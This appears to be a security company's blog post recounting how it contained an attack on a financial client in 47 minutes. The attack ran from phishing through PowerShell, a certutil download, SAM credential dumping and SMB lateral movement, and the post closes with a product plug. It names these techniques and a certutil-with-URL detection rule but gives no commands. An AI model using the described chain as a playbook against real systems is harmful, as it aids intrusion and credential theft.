How We Detected and Stopped an Attack on a Client in 47 Minutes (Real Case)

How We Detected and Stopped an Attack on a Client in 47 Minutes (Real Case)

In February 2026, one of our clients — a mid-sized financial company — came under a coordinated attack. It began with a phishing email that bypassed corporate mail filters. An employee downloaded a file that executed a PowerShell script. We received the first alert at 14:12.

The first thing that triggered was a correlation rule in the monitoring system: failed login from a new country → PowerShell launch with unusual arguments → outbound connection to an unknown IP. This gave us the first 8 seconds to react.

At 14:13, the team activated the playbook: automatic host isolation (network disconnection without shutdown), instant memory and disk snapshot creation. Simultaneously, an analyst began dissecting the command line: the script attempted to download additional payload via certutil.

By 14:18 we already knew: the attacker was using living-off-the-land techniques to avoid leaving files on disk. We observed an attempt to access the SAM file through a legitimate process — classic credential dumping.

At 14:25 we confirmed: the attacker gained local administrative access and tried lateral movement via SMB to the file server. Network segmentation worked here — access was restricted to a specific segment only, blocking further movement.

By 14:37 we completed initial containment: terminated all suspicious processes, blocked outbound traffic from the host, and rotated passwords for all related accounts. Memory snapshot analysis revealed the payload was loaded in memory and attempting reverse connection.

By 14:59 we had the full chain: phishing → PowerShell execution → credential dumping → lateral movement attempt. Total time from first alert to full containment — 47 minutes.

What enabled such a fast response?

  • Pre-configured correlation rules linking events over time.
  • Automated playbook that performed isolation without human delay.
  • Network segmentation that prevented free lateral movement.
  • Continuous endpoint telemetry monitoring.

After the incident we conducted a full debrief: added a new rule to detect certutil with URLs, strengthened PowerShell script checks, updated segmentation policy. The client received a detailed report and a 90-day action plan.

This case is a perfect example of why we built Besspektikers as a step-by-step system: from basic threat understanding to full-cycle simulations. Without a systematic approach, 47 minutes could have turned into 47 hours.

Back to blog